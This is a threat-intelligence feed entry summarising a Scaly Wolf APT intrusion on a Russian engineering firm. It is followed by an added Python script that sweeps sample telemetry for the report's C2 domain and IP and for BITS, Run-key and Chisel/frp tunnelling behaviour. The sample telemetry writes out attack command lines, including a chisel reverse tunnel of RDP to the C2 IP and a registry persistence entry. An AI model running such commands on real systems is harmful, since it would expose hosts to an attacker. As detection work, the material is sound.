
Take 2: Scaly Wolf persistently targets Russian engineering company’s secrets

ID: e05e753c-3ed5-55f7-a0f2-8517a90e4036

STIX ID: report--e05e753c-3ed5-55f7-a0f2-8517a90e4036

Feed Name: Dr.Web News

Threat Score
75/100

Date Published: 2025-08-19

Date Updated: 2026-04-27

...
...

Doctor Web investigated a targeted intrusion against a Russian engineering firm in May–June 2025, attributed to the Scaly Wolf APT group. Initial access came through phishing e-mails carrying password-protected ZIP archives that delivered Trojan.Updatar.1, a downloader using RockYou-based obfuscation, which then fetched further Updatar modules and Meterpreter payloads. The attackers stole credentials with HandleKatz, moved laterally over RDP, deployed the Chisel and frp tunneling tools, and used BITS jobs and registry changes for persistence. The report details the malware samples, the C2 infrastructure (notably roscosmosmeet.online and 77.105.161.30), the post-exploitation tooling, IoCs and mapped MITRE ATT&CK techniques, and recommends tightening antivirus configuration and keeping systems patched.
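The following is an added example, not code from Doctor Web or the feed, of how a defender might sweep endpoint telemetry for the two network indicators quoted above and for the behaviours the summary names (BITS-job persistence, Run-key registry persistence, Chisel/frp tunnelling). The telemetry lines, their `key=value` format, the host names and the command-line patterns are all constructed assumptions for this example; only the C2 domain and IP come from the summary.

```python
"""IoC and behaviour sweep over constructed endpoint telemetry (added example)."""
import ipaddress
import re
from dataclasses import dataclass

# Network indicators quoted in the report summary.
C2_DOMAINS = {"roscosmosmeet.online"}
C2_IPS = {"77.105.161.30"}

# Behavioural rules for tooling the report names. The tool names are the
# report's; how they appear on a command line is this example's assumption.
PROCESS_RULES = [
    ("bits_job", re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/(?:create|addfile|setnotifycmdline|resume)\b", re.I)),
    ("bits_job", re.compile(r"\bStart-BitsTransfer\b", re.I)),
    ("run_key", re.compile(r"\breg(?:\.exe)?\s+add\b.*?\\CurrentVersion\\Run\b", re.I)),
    ("chisel_tunnel", re.compile(r"\bchisel(?:\.exe)?\s+client\b", re.I)),
    ("frp_tunnel", re.compile(r"\bfrpc(?:\.exe)?\b", re.I)),
]

DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed telemetry: DNS queries, network connections and process starts
# from two hypothetical hosts. Not taken from the report.
SAMPLE_TELEMETRY = [
    'ts=2025-05-14T09:12:03Z host=ws-eng-07 type=dns query=roscosmosmeet.online',
    'ts=2025-05-14T09:12:05Z host=ws-eng-07 type=net proc=updater.exe dst=77.105.161.30:443',
    'ts=2025-05-14T09:12:09Z host=ws-eng-07 type=proc cmd="bitsadmin /create /download updjob"',
    'ts=2025-05-14T09:13:41Z host=ws-eng-07 type=proc cmd="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /t REG_SZ /d C:\\Users\\Public\\upd.exe"',
    'ts=2025-05-15T22:04:17Z host=srv-fs-01 type=proc cmd="chisel.exe client 77.105.161.30:8080 R:3389:127.0.0.1:3389"',
    'ts=2025-05-15T22:05:02Z host=ws-eng-07 type=dns query=update.microsoft.com',
    'ts=2025-05-15T22:05:30Z host=ws-eng-07 type=proc cmd="notepad.exe C:\\Users\\ivanov\\notes.txt"',
]


@dataclass(frozen=True)
class Hit:
    line_no: int
    host: str
    rule: str
    evidence: str


def parse_fields(line):
    """Split a 'k=v k="v with spaces"' line into a dict (constructed format)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def domain_is_c2(name):
    """Exact match or subdomain of a listed C2 domain."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in C2_DOMAINS)


def ip_is_c2(token):
    """Validate the token as an IP address before comparing against the IoC set."""
    try:
        return str(ipaddress.ip_address(token)) in C2_IPS
    except ValueError:
        return False


def scan_line(line_no, line):
    fields = parse_fields(line)
    host = fields.get("host", "?")
    hits = []
    # Network-layer IoCs: look for the C2 domain/IP in any field value,
    # so a tunnel command line pointing at the C2 IP is caught too.
    for value in fields.values():
        for name in DOMAIN_RE.findall(value):
            if domain_is_c2(name):
                hits.append(Hit(line_no, host, "c2_domain", name))
        for ip in IPV4_RE.findall(value):
            if ip_is_c2(ip):
                hits.append(Hit(line_no, host, "c2_ip", ip))
    # Behavioural rules apply only to process command lines.
    cmd = fields.get("cmd", "")
    for rule, pattern in PROCESS_RULES:
        if pattern.search(cmd):
            hits.append(Hit(line_no, host, rule, cmd))
    return hits


def scan(lines):
    hits = []
    for n, line in enumerate(lines, 1):
        hits.extend(scan_line(n, line))
    return hits


def affected_hosts(hits):
    return sorted({h.host for h in hits})


if __name__ == "__main__":
    for h in scan(SAMPLE_TELEMETRY):
        print(f"line {h.line_no} {h.host} {h.rule}: {h.evidence}")
```

The IP check goes through `ipaddress` so that a partial match such as `77.105.161.3` is not mistaken for the indicator, and the domain check accepts subdomains of the C2 domain but rejects look-alikes that merely start with it.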
